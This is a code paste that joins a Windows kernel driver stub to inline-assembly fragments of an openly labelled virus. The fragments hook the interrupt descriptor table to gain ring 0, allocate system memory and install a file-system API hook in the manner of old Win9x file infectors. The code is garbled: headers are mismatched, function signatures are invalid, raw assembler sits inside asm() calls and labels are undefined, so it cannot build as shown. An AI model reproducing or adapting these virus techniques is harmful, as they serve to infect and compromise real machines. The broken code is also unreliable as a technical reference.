ASM Script // R@i4@ //

1. #include <stdio.h>
2. #include <emmintrin.h>
3. #include <omp.h>
4. #include <ntddk.h>
5. #include <iostream>
6. #include <wdf.h>
7. #include <asm.h>
8. using namespace std;
9. int main();
10. DRIVER_INITIALIZE DriverEntry;
11. EVT_WDF_DRIVER_DEVICE_ADD KmdfSmallEvtDeviceAdd;
12.  
13. NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath)
14. {
15. NTSTATUS status;
16. WDF_DRIVER_CONFIG config;
17.  
18. KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "KmdfSmall: DriverEntry\n"));
19. WDF_DRIVER_CONFIG_INIT(&config, KmdfSmallEvtDeviceAdd);
20. status = WdfDriverCreate(DriverObject, RegistryPath, WDF_NO_OBJECT_ATTRIBUTES, &config, WDF_NO_HANDLE);
21.  
22. DbgPrint("Privet! Udachi Bratan (" ^.^ "");
23.  
24. return status;
25. }
26.  
27. NTSTATUS KmdfSmallEvtDeviceAdd(_In_ WDFDRIVER Driver, _Inout_ PWDFDEVICE_INIT DeviceInit)
28. {
29. NTSTATUS status;
30. WDFDEVICE hDevice;
31. UNREFERENCED_PARAMETER(Driver);
32.  
33. KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "KmdfSmall: KmdfSmallEvtDeviceAdd\n"));
34. status = WdfDeviceCreate(&DeviceInit, WDF_NO_OBJECT_ATTRIBUTES, &hDevice);
35. return status;
36. }
37.  
38. int main(ASM-BIOS)
39. {
40.  
41. /* Ring3 Initiation */
42.  
43. asm(
44. lea eax, [esp-04h*2]
45.  
46. xor ebx, ebx
47. xchg eax, fs:[ebx]
48.  
49. call @0
50. @0:
51. pop ebx
52.  
53. lea ecx, StopToCode-@0[ebx]
54. push ecx
55.  
56. push eax
57. );
58.  
59. /* Ring0 Initiation */
60.  
61. asm(
62. push eax ;
63. sidt [esp-02h] ; IDT Adress
64. pop ebx ;
65.  
66. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
67.  
68. cli
69.  
70. mov ebp, [ebx] ; EXDBS
71. mov bp, [ebx-04h] ; Enter Point
72.  
73. lea esi, MyExceptionHook-@1[ecx]
74.  
75. push esi
76.  
77. mov [ebx-04h], si ;
78. shr esi, 16 ; MOD'Y
79. mov [ebx+02h], si ; Enter Point
80.  
81. pop esi
82.  
83. int HookExceptionNumber ; GenerateException
84. ReturnAddressOfEndException = $
85. );
86.  
87. /* Save Data */
88.  
89. asm(
90.  
91. ReadyRestoreSE:
92. sti
93.  
94. xor ebx, ebx
95.  
96. jmp RestoreSE
97. );
98.  
99. /* Ring3 Alloc Script */
100.  
101. asm(
102. ExitRing0Init:
103. mov [ebx-04h], bp ;
104. shr ebp, 16 ; Restore BinAccess
105. mov [ebx+02h], bp ;
106. );
107.  
108. /* Locate SysMem */
109.  
110. asm(
111. mov dr0, ebx ; Set the Mark of My Virus Exist in System
112.  
113. push 00000000fh ;
114. push ecx ;
115. push 0ffffffffh ;
116. push ecx ;
117. push ecx ;
118. push ecx ;
119. push 000000001h ;
120. push 000000002h ;
121. int 20h ; VMMCALL _PageAllocate
122. _PageAllocate = $ ;
123. dd 00010053h ; Use EAX, ECX, EDX, and flags
124. add esp, 08h*04h
125.  
126. xchg edi, eax ; EDI = SystemMemory Start Address
127.  
128. lea eax, MyVirusStart-@2[esi]
129.  
130. iretd ; Return 0 ()
131. );
132.  
133. /* Install Code */
134.  
135. asm(
136. InstallMyFileSystemApiHook:
137.  
138. lea eax, FileSystemApiHook-@6[edi]
139.  
140. push eax ;
141. int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
142. IFSMgr_InstallFileSystemApiHook = $ ;
143. dd 00400067h ; EAX ECX EDX Perms And Flags
144.  
145. mov dr0, eax ; Save OldFileSystemApiHook Address
146.  
147. pop eax ; EAX = FileSystemApiHook Address
148.  
149. ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
150. mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
151. mov edx, [ecx]
152. mov OldInstallFileSystemApiHook-@3[eax], edx
153.  
154. ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
155. lea eax, InstallFileSystemApiHook-@3[eax]
156. mov [ecx], eax
157.  
158. cli
159.  
160. jmp ExitRing0Init
161. );